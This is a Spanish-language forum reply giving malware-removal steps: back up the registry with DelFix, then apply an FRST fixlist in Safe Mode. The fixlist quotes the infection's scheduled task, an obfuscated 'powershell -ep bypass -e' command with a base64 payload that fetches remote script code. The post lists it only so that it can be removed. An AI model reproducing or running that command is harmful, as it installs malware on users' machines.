Troyano/Malware molesto

Ayuda General
6

Hola

No has descargado y ejecutado FRST desde el escritorio, muevelo allí si no fallará el paso del Fixlist.

:arrow_forward: MUY Importante :arrow_backward: Realiza una copia de seguridad del registro :

  • Para hacerlo descarga :arrow_forward: DelFix.exe( en tu escritorio).

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona -Ejecutar como Administrador-).

  • Atención, ahora marca/selecciona únicamente la casilla "Create registry backup", las demás NO.

  • Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

A continuación :warning: con los demás programas cerrados ve a :arrow_forward: Inicio :arrow_forward: Ejecutar :arrow_forward: y escribe Notepad.exe.

  • Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad.
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
HKLM\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [NetLimiter] => "C:\Program Files\Locktime Software\NetLimiter 4\nlclientapp.exe" /minimized
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [] => [X]
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Winlogon: [Shell] C:\Windows\explorer.exe [4312248 2016-07-16] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
Task => {35EF4182-F900-4632-B072-8639E4478A61}
Task: {87402BF2-539F-45AA-B6A8-686921A45CD0} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1542536 2019-11-05] (AVAST Software s.r.o. -> AVAST Software)
Task: {D637D5F4-3706-45D2-9DED-A40EB449CDE9} - System32\Tasks\MicroSoft\Windows\owBmpfYO\JpNYrnb => cmd /c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBNAGkAYwByAG8AUwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABvAHcAQgBtAHAAZgBZAE8AXABKAHAATgBZAHIAbgBiACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAbQB4AG4AeQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBpAGcAXwAyADA (the data entry has 586 more characters).
Task: {FEE784E9-0FE0-4E99-9F72-131A85CDE224} - \VQMUsn\GXQxU -> No File <==== ATTENTION
CHR Extension: (Asora) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfomjghdcjmkkmjpmdiimfllafbmpack [2018-08-12]
CHR Extension: (Chrome Media Router) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-11-06]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ijahobfejgeblmkpcmgpelfibgnnjpil]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
U4 dcpsvc; no ImagePath
U4 DiagTrack; no ImagePath
2019-11-16 01:54 - 2019-11-23 14:52 - 000002472 _____ C:\Windows\system32\Tasks\{2A3E5AA4-AD05-45CD-A693-C23160DA1F7B}
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-sys.job
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001.job
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\IObit
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\ProgramData\IObit
2019-11-23 02:50 - 2018-11-10 22:07 - 000000000 ____D C:\ProgramData\{2F4FEA2C-A50D-60EA-23CB-FEA8B9897566}
ShellServiceObjects: No Name -> {872f8dc8-dde4-43bd-ac7a-e3d9fe86ceac} => 
ShellServiceObjects: No Name -> {900c0763-5cad-4a34-bc1f-40cd513679d5} => 
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION

HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Guárdalo bajo el nombre de FIXLIST.TXT en el escritorio :arrow_backward: Esto es muy importante.

:o: Nota :o: Es importante que la herramienta FRST.exe (Farbar Recovery Scanner Tool) y FIXLIST.TXT se encuentren en la misma ubicación (escritorio) o si no, no trabajara.


Y ahora usa el 2º MÉTODO: de esta Faq de Windows 8(aplicable a Windows 10) :arrow_forward: ¿Cómo iniciar Windows 8/8.1 en Modo Seguro?, para trabajar desde ese modo de windows.

  • Ejecuta FRST.exe.(Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas -Ejecutar como Administrador-).
  • Presionar el botón FIX y aguardar a que termine.
  • La Herramienta guardara el reporte de reparación en el escritorio (FIXLOG.TXT).

Pega el contenido de este fichero en tu próxima respuesta.

Reiniciar el equipo y comprobar su funcionamiento en relación al problema planteado y comentarlo.

Un saludo